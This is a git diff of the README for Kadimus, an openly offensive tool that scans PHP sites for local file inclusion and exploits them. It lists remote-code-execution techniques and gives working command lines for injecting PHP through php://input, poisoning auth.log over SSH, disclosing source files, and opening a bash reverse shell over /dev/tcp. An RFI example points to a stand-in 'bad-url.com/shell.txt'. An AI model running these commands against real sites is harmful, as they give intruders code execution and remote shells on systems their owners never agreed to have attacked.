update README.md

README.md

@@ -2,10 +2,10 @@
  [![GitHub stars](https://img.shields.io/github/stars/P0cL4bs/Kadimus.svg)](https://github.com/P0cL4bs/Kadimus/stargazers)
  [![GitHub license](https://img.shields.io/github/license/P0cL4bs/Kadimus.svg)](https://github.com/P0cL4bs/Kadimus/blob/master/license.txt)
 
-# Kadimus
+# kadimus
 LFI Scan & Exploit Tool
 --
-Kadimus is a tool to check sites to lfi vulnerability , and also exploit it
+kadimus is a tool to check and exploit lfi vulnerability focus on PHP systems
 
 Features:
 
@@ -14,93 +14,33 @@ Features:
 - [x] /proc/self/environ RCE
 - [x] php://input RCE
 - [x] data://text RCE
+- [x] expect://cmd RCE
 - [x] Source code disclosure
-- [x] Multi thread scanner
 - [x] Command shell interface through HTTP Request
 - [x] Proxy support (socks4://, socks4a://, socks5:// ,socks5h:// and http://)
-- [x] Proxy socks5 support for bind connections
+- [x] Proxy socks5 support for remote connections
 
 ## Compile:
 
-```sh
-$ git clone https://github.com/P0cL4bs/Kadimus.git
-$ cd Kadimus
-```
-
-You can run the configure file:
+First, make sure you have all dependencies installed in your system.
+Dependencies: libcurl, libopenssl, libpcre and libssh
 
+Then you can clone the repository, to get the source code:
 ```sh
-./configure
-```
-
-Or follow this steps:
-
-### Installing libcurl:
-* CentOS/Fedora
-
-```sh
-# yum install libcurl-devel
-```
-
-* Debian based
-
-```sh
-# apt-get install libcurl4-openssl-dev
-```
-
-* Mac OS X based
-
-```sh
-$ brew install openssl
-```
-
-### Installing libpcre:
-* CentOS/Fedora
-
-```sh
-# yum install pcre-devel
-```
-
-* Debian based
-
-```sh
-# apt-get install libpcre3-dev
-```
-
-* Mac OS X based
-
-```sh
-$ brew install pcre
-```
-
-### Installing libssh:
-
-* CentOS/Fedora
-
-```sh
-# yum install libssh-devel
-```
-
-* Debian based
-
-```sh
-# apt-get install libssh-dev
-```
-
-* Mac OS X based
-
-```sh
-$ brew install libssh
+$ git clone https://github.com/P0cL4bs/kadimus.git
+$ cd kadimus
 ```
 
 ### And finally:
 
 ```sh
 $ make
 ```
+
 ## Options:
 
 ```
+Options:
   -h, --help                    Display this help menu
 
   Request:
@@ -112,9 +52,7 @@ $ make
 
   Scanner:
     -u, --url STRING            URL to scan/exploit
-    -U, --url-list FILE         File contains url list to scan
     -o, --output FILE           File to save output results
-    -t, -threads NUMBER         Number of threads (2..1000)
 
   Explotation:
     --parameter STRING          Parameter name to inject exploit
@@ -139,6 +77,7 @@ $ make
       input                     Try run PHP Code using php://input
       auth                      Try run PHP Code using /var/log/auth.log
       data                      Try run PHP Code using data://text
+      expect                    Try run a command using expect://cmd
 
     Source Disclosure:
       -S, --get-source          Try get the source file using filter://
@@ -152,12 +91,13 @@ $ make
 ### Scanning:
 ```
 ./kadimus -u localhost/?pg=contact -A my_user_agent
-./kadimus -U list.txt --threads 10 --connect-timeout 10 --retry-times 0
 ```
+
 ### Get source code of file:
 ```
 ./kadimus -u localhost/?pg=contact -S -f "index.php%00" -O local_output.php --parameter pg
 ```
+
 ### Execute php code:
 ```
 ./kadimus -u localhost/?pg=php://input%00 -C '<?php echo "pwned"; ?>' -T input
@@ -167,12 +107,12 @@ $ make
 ```
 ./kadimus -t localhost/?pg=/var/log/auth.log -T auth -c 'ls -lah' --ssh-target localhost
 ```
+
 ### Checking for RFI:
 
 You can also check for RFI errors, just put the remote url on resource/common_files.txt
 and the regex to identify this, example:
 
-
 ```php
 /* http://bad-url.com/shell.txt */
 <?php echo base64_decode("c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU="); ?>
@@ -185,5 +125,14 @@ http://bad-url.com/shell.txt?:scorpion say get over here
 
 ### Reverse shell:
 ```
-./kadimus -u localhost/?pg=contact.php -T data --parameter pg -l 12345 -c 'bash -i >& /dev/tcp/127.0.0.1/12345 0>&1' --retry-times 0
+./kadimus -u localhost/?pg=contact.php -T data --parameter pg -lp 12345 -c '/bin/bash -c "bash -i >& /dev/tcp/172.17.0.1/1234 0>&1"' --retry-times 0
 ```
+
+Contributing
+------------
+You can help with code, or donating money.
+If you wanna help with code, use the kernel code style as a reference.
+
+Paypal: [![](https://www.paypalobjects.com/en_US/i/btn/btn_donate_SM.gif)](https://www.paypal.com/cgi-bin/webscr?cmd=_donations&business=RAG26EKAYHQSY&currency_code=BRL&source=url)
+
+BTC: 1PpbrY6j1HNPF7fS2LhG9SF2wtyK98GSwq